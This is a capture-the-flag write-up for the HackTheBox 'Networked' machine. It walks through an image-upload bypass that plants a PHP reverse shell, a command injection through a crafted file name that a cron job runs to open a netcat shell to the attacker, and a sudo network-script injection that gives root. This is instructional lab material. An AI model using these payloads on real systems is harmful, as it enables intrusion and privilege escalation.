HackTheBox [HTB] - Networked

Concepts:

1. Trick the MIME Type Checking PHP Scripts 
2.  Basic Command Injection 
3.  Use a Privileged Script to exploit a issue with the parameters set to the files in network-scripts

     I have included few resource links in the references section, for beginners to started with.

Recon :

                  The initial recon starts with nmap, which probably gives the places to start with.,

    

    

   Using Gobuster, gave few directories out of which the backup folder seemed interesting. It had the source of the PHP scripts running on the system. 

   Examining the lib.php, the PHP functions including finfo_open(FILEINFO_MIME) , and     @mime_content_type. These functions use the magic bits to detect the file types.

   It can be tricked, by adding some magic headers "GIF89a;" to the reverse shell. 

   Gobuster also revealed pages such as "uploads.php" & "photos.php". Go to the uploads.php page and upload any JPG or GIF pic (make sure to add php in the file name ie. file.php.jpg), capture the traffic in burp suite before it leaves from attacker's machine.

  Leave the first 2 lines in the request and replace the other lines with PHP reverse shellcode in the request body. The reverse shell file should be uploaded which should have bypassed extension & filetype (magic headers) validations.

 Go to <attackers-ip>/photos.php and check the uploaded file. Turn on the NetCat listener and execute the uploaded reverse shell by hitting the URL <attackers-ip>/uploads/<uploaded_File_name>.php.jpg

Reverse Shell & User Flag:

we have found a user 'guly', cronjob invoked by the user is running. We can exploit it to escalate to guly user privilege using the following commands.

touch /var/www/html/uploads/\;nc \-c\ bash <attackers-ip>\ <attacker-port>

The above command will create a file in the name "; nc -c bash <attackers-ip> <attacker-port>"

The cronjob when run takes the file name as an argument and executes it. Start a Netcat listener and wait for the reverse connection.

*WE CAN READ THE USER FLAG FROM THE GULY'S HOME DIRECTORY

Root Flag:

After enumerating the victim machine for some time, we found a shell script running as a SUDO.

/usr/local/sbin/changename.sh

The script asks for some inputs and uses Network Scripts which has privilege escalation vulnerability (For more details check References section)

To exploit the vulnerability. Run the script, in the "interface NAME" enter 

"anystring <space> /bin/bash", enter random value for the remaining parameters and press enter to get root access.

*WE CAN READ THE ROOT FLAG FROM THE ROOT DIRECTORY

References :

• Bypassing Image Upload - https://github.com/xapax/security/blob/master/bypass_image_upload.md    
• Command Injection - https://www.owasp.org/index.php/Command_Injection
• Privilege Escalation with Network Scripts - https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f